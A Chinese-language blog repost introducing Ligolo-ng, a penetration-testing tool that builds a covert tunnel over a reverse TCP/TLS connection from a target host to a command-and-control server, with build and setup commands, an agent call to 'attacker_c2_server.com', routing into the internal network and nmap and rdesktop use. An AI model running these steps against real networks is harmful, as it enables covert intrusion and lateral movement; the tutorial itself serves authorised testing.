摘要:是一款轻量级的快速工具,可以帮助广大渗透测试人员利用反向连接建立一条隐蔽的通信信道,而且无需支持。在使用时,你应该使用或以避免假阳性。
Ligolo-ng是一款高级信道工具,该工具基于TUN接口实现其功能。Ligolo-ng是一款轻量级的快速工具,可以帮助广大渗透测试人员利用反向TCP/TLS连接建立一条隐蔽的通信信道,而且无需SOCKS支持。
Tun接口(不再需要SOCKS);
简单的UI界面,支持选择代理和网络信息;
易于使用,易于安装;
基于Let’s Encrypt的自动化证书配置;
高性能(多路复用);
不需要高级权限;
套接字监听/代理绑定;
多平台代理支持;
构建Ligolo-ng
$ go build -o agent cmd/agent/main.go$ go build -o proxy cmd/proxy/main.go# Build agent for Windows$ GOOS=windows go build -o agent.exe cmd/agent/main.go
安装Ligolo-ng
我们需要在自己的命令控制服务器上开启代理服务,默认使用11601端口监听:
$ sudo ip tuntap add user [your_username] mode tun ligolo$ sudo ip link set ligolo up$ ./proxy -h # Help options$ ./proxy -autocert # Automatically request LetsEncrypt certificates
首先,我们需要在目标设备上启动代理(无需特殊权限):
$ ./agent -connect attacker_c2_server.com:11601
此时,代理服务器上将出现一条会话链接:
INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"
使用“session”命令选择代理:
ligolo-ng » session? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000
使用“ifconfig”命令显示代理的网络配置信息:
[Agent : nchatelain@nworkstation] » ifconfig[...]┌─────────────────────────────────────────────┐│ Interface 3 │├──────────────┬──────────────────────────────┤│ Name │ wlp3s0 ││ Hardware MAC │ de:ad:be:ef:ca:fe ││ MTU │ 1500 ││ Flags │ up|broadcast|multicast ││ IPv4 Address │ 192.168.0.30/24 │└──────────────┴──────────────────────────────┘
在代理/中继服务器上添加一条指向192.168.0.0/24代理网络的路由:
$ sudo ip route add 192.168.0.0/24 dev ligolo
最后,在代理上开启一条通信信道:
[Agent : nchatelain@nworkstation] » start[Agent : nchatelain@nworkstation] » INFO[0690] Starting tunnel to nchatelain@nworkstation
现在,你就可以通过代理服务器访问192.168.0.0/24代理网络:
$ nmap 192.168.0.0/24 -v -sV -n[...]$ rdesktop 192.168.0.123[...]
TCP
UDP
ICMP
在Ligolo-ng的帮助下,你可以轻松达到100 Mbits/秒的速度。下面给出的测试结果是在一台200Mbits/s服务器上使用iperf测试的一条200Mbits/s的链接:
$ iperf3 -c 10.10.0.1 -p 24483Connecting to host 10.10.0.1, port 24483[ 5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483[ ID] Interval Transfer Bitrate Retr Cwnd[ 5] 0.00-1.00 sec 12.5 MBytes 105 Mbits/sec 0 164 KBytes [ 5] 1.00-2.00 sec 12.7 MBytes 107 Mbits/sec 0 263 KBytes [ 5] 2.00-3.00 sec 12.4 MBytes 104 Mbits/sec 0 263 KBytes [ 5] 3.00-4.00 sec 12.7 MBytes 106 Mbits/sec 0 263 KBytes [ 5] 4.00-5.00 sec 13.1 MBytes 110 Mbits/sec 2 134 KBytes [ 5] 5.00-6.00 sec 13.4 MBytes 113 Mbits/sec 0 147 KBytes [ 5] 6.00-7.00 sec 12.6 MBytes 105 Mbits/sec 0 158 KBytes [ 5] 7.00-8.00 sec 12.1 MBytes 101 Mbits/sec 0 173 KBytes [ 5] 8.00-9.00 sec 12.7 MBytes 106 Mbits/sec 0 182 KBytes [ 5] 9.00-10.00 sec 12.6 MBytes 106 Mbits/sec 0 188 KBytes - - - - - - - - - - - - - - - - - - - - - - - - -[ ID] Interval Transfer Bitrate Retr[ 5] 0.00-10.00 sec 127 MBytes 106 Mbits/sec 2 sender[ 5] 0.00-10.08 sec 125 MBytes 104 Mbits/sec receiver
由于代理并不是以高级权限运行的,因此无法转发原始数据包。当你执行“NMAP SYN-SCAN”的时候,代理上会执行一次TCP connect()。
在使用Nmap时,你应该使用“–unprivileged”或“-PE”以避免假阳性。
文章版权归作者所有,未经允许请勿转载,若此文章存在违规行为,您可以联系管理员删除。
转载请注明本文地址:https://www.ucloud.cn/yun/121222.html
摘要:宋体为了云计算的健康发展和等级保护工作在新形势下顺利推进,就不能忽视对云计算面临的各类安全威胁的研究和分析,并制定和建立相应的等级保护政策技术体系,应对即将到来的云浪潮。 为了云计算的健康发展和等级保护工作在新形势下顺利推进,就不能忽视对云计算面临的各类安全威胁的研究和分析,并制定和建立相应的等级保护政策、技术体系,应对即将到来的云浪潮。在云环境中,除了传统意义所面临的各类安全威胁外...
阅读 3208·2021-11-23 09:51
阅读 2433·2021-09-27 13:34
阅读 2443·2021-09-08 09:45
阅读 642·2019-08-30 15:44
阅读 3457·2019-08-29 12:17
阅读 2739·2019-08-26 12:18
阅读 2601·2019-08-26 10:10
阅读 3058·2019-08-23 18:02